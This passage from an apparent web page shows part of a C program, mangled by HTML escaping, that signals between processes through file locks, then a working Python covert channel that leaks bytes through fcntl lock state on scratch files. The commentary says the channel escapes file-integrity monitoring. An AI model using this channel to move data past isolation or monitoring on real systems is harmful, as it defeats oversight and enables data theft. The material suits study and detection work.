%s can&amp;#39;t be opened as %s\n&amp;quot;, f-&amp;gt;sync2, strerror(errno));&lt;br&gt;    exit(1);&lt;br&gt;   }&lt;br&gt;   &lt;br&gt;   test.l_type = F_RDLCK;&lt;br&gt;   test.l_whence = SEEK_SET;&lt;br&gt;   test.l_start = 0;&lt;br&gt;   test.l_len = 0;&lt;br&gt; &lt;br&gt;   if(lock){&lt;br&gt;    if(fcntl(syncfd2, F_GETLK, &amp;amp;test) == -1){&lt;br&gt;     printf(&amp;quot;Doh.... Failed getting FLOCK info for %s as %s\n&amp;quot;, f-&amp;gt;sync2, strerror(errno));&lt;br&gt;     exit(1);&lt;br&gt;    }&lt;br&gt;    &lt;br&gt;    if(test.l_type == F_UNLCK){&lt;br&gt;     //not locked&lt;br&gt;     if(close(syncfd2) == -1){&lt;br&gt;      printf(&amp;quot;Doh.... close error on %s as %s\n&amp;quot;,f-&amp;gt;sync2, strerror(errno));&lt;br&gt;      exit(1);&lt;br&gt;     }&lt;br&gt;     if(SLEEP) sleep(SLEEP);&lt;br&gt;     goto checkit;&lt;br&gt;    }&lt;br&gt;&lt;br&gt;    else {&lt;br&gt;     //locked&lt;br&gt;     if(VERBOSE) printf(&amp;quot;%s is locked.... setting file locks\n&amp;quot;,f-&amp;gt;sync2);&lt;br&gt;     if(VERBOSE == 2) printf(&amp;quot;pid of owner: %d\n&amp;quot;, test.l_pid);&lt;br&gt;     if(close(syncfd2) == -1){&lt;br&gt;      printf(&amp;quot;Doh.... close error on %s as %s\n&amp;quot;,f-&amp;gt;sync2, strerror(errno));&lt;br&gt;      exit(1);&lt;br&gt;     }&lt;br&gt;    &lt;br&gt;    goto next;&lt;br&gt;    }&lt;br&gt;   }// end of lock&lt;br&gt;   &lt;br&gt;   if(!lock){&lt;br&gt;    if(fcntl(syncfd2, F_GETLK, &amp;amp;test) == -1){&lt;br&gt;     printf(&amp;quot;Doh.... Failed getting FLOCK info for %s as %s\n&amp;quot;, f-&amp;gt;sync2, strerror(errno));&lt;br&gt;     exit(1);&lt;br&gt;    }&lt;br&gt;&lt;br&gt;    if(test.l_type == F_UNLCK){&lt;br&gt;     printf(&amp;quot;%s is not locked.... setting file locks\n&amp;quot;, f-&amp;gt;sync2);//continue &lt;br&gt;     if(close(syncfd2) == -1){&lt;br&gt;      printf(&amp;quot;Doh.... 
close error on %s as %s\n&amp;quot;, f-&amp;gt;sync2, strerror(errno));&lt;br&gt;      exit(1);&lt;br&gt;     }&lt;br&gt;     goto next;&lt;b
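The handshake the listing is built around (set values, flag A 1, check flag B 1, set values, flag A 0, check flag B 0) and the one-bit-per-lock encoding are easier to see in a short runnable form. The Python below is an added example written for this page, not Ste Jones' filetrickery.c: a forked sender holds write locks on eight scratch files to encode one byte per round, and the receiver recovers each byte from lock state alone. Assumptions of my own, not taken from the page: Linux/POSIX fcntl record locks; scratch files created in a temporary directory by covert_transfer(); a one-byte length prefix in place of the original's trailing zeros (its to-do item 2); and a probe that attempts a non-blocking shared lock instead of calling F_GETLK, because Python would need the platform-specific struct flock layout for F_GETLK.

```python
"""Covert channel over POSIX record locks: one byte per handshake round,
bit i of the byte = a write lock held (1) or not held (0) on scratch file i.
Added example for this page, not the File Trickery source above.  It keeps
the original's handshake (set data, flag A := phase, wait for flag B ==
phase) but, as my own assumptions: Linux/POSIX fcntl locks, scratch files
made by covert_transfer() in a temp dir, a one-byte length prefix instead
of trailing zeros, and a non-blocking shared-lock attempt as the probe
instead of F_GETLK (whose struct flock layout is platform specific)."""
import errno
import fcntl
import os
import tempfile
import time

POLL = 0.002  # seconds between probes; keeps the busy-wait cheap


def is_write_locked(fd):
    """True when another process holds a write lock on fd's file: the
    non-blocking shared-lock attempt fails with EAGAIN (EACCES on some
    systems).  Locks are per process, so never probe your own flag file."""
    try:
        fcntl.lockf(fd, fcntl.LOCK_SH | fcntl.LOCK_NB)
    except OSError as exc:
        if exc.errno in (errno.EAGAIN, errno.EACCES):
            return True
        raise
    fcntl.lockf(fd, fcntl.LOCK_UN)  # drop the probe lock at once
    return False


def set_flag(fd, on):
    """on=True holds an exclusive lock, on=False releases it.  Blocking
    LOCK_EX simply waits out the peer's momentary probe lock."""
    fcntl.lockf(fd, fcntl.LOCK_EX if on else fcntl.LOCK_UN)


def wait_until(fd, locked, timeout=10.0):
    """Poll until the foreign lock state of fd equals 'locked'."""
    deadline = time.monotonic() + timeout
    while is_write_locked(fd) != locked:
        if time.monotonic() > deadline:
            raise TimeoutError("peer stopped responding")
        time.sleep(POLL)


def sender(paths, message):
    """Child role: leak the length byte, then every byte of message."""
    bits = [os.open(p, os.O_RDWR) for p in paths["bits"]]
    sync_a = os.open(paths["sync_a"], os.O_RDWR)
    sync_b = os.open(paths["sync_b"], os.O_RDWR)
    phase = 0
    for byte in bytes([len(message)]) + message:
        phase = 1 - phase
        for i in range(8):                     # bit i set -> lock file i
            set_flag(bits[i], (byte >> i) % 2 == 1)
        set_flag(sync_a, phase == 1)           # flag A := phase: data ready
        wait_until(sync_b, phase == 1)         # flag B == phase: data read
    # exiting the process releases every lock it still holds


def receiver(paths):
    """Parent role: rebuild the bytes from which files are write-locked."""
    bits = [os.open(p, os.O_RDONLY) for p in paths["bits"]]
    sync_a = os.open(paths["sync_a"], os.O_RDONLY)
    sync_b = os.open(paths["sync_b"], os.O_RDWR)
    out, remaining, phase = bytearray(), None, 0
    while remaining is None or remaining > 0:
        phase = 1 - phase
        wait_until(sync_a, phase == 1)
        byte = sum(2 ** i for i in range(8) if is_write_locked(bits[i]))
        if remaining is None:
            remaining = byte                   # first byte is the length
        else:
            out.append(byte)
            remaining = remaining - 1
        set_flag(sync_b, phase == 1)           # acknowledge this round
    return bytes(out)


def covert_transfer(message):
    """Demo harness (constructed, not from the page): run the sender in a
    forked child and the receiver here over fresh empty scratch files, and
    return what the receiver decoded."""
    if len(message) > 255:
        raise ValueError("length prefix is a single byte")
    tmp = tempfile.mkdtemp(prefix="lockchan-")
    paths = {"bits": [os.path.join(tmp, "bit%d" % i) for i in range(8)],
             "sync_a": os.path.join(tmp, "sync_a"),
             "sync_b": os.path.join(tmp, "sync_b")}
    for p in paths["bits"] + [paths["sync_a"], paths["sync_b"]]:
        open(p, "wb").close()  # contents, size and mtime never change again
    pid = os.fork()
    if pid == 0:
        try:
            sender(paths, message)
            os._exit(0)
        except BaseException:
            os._exit(1)
    try:
        return receiver(paths)
    finally:
        os.waitpid(pid, 0)


if __name__ == "__main__":
    print(covert_transfer(b"secret"))
```

Run it directly and it prints the decoded message. Two properties of the channel are visible in this example: nothing in the scratch files changes during the transfer, not contents, size or modification time, only fcntl lock state, so file-integrity monitoring will not see it and the only host artefacts are open descriptors and the kernel lock table (on Linux, /proc/locks); and because POSIX record locks are per process, each side can only probe the files it does not lock itself, which is why the sender and receiver never share a flag file.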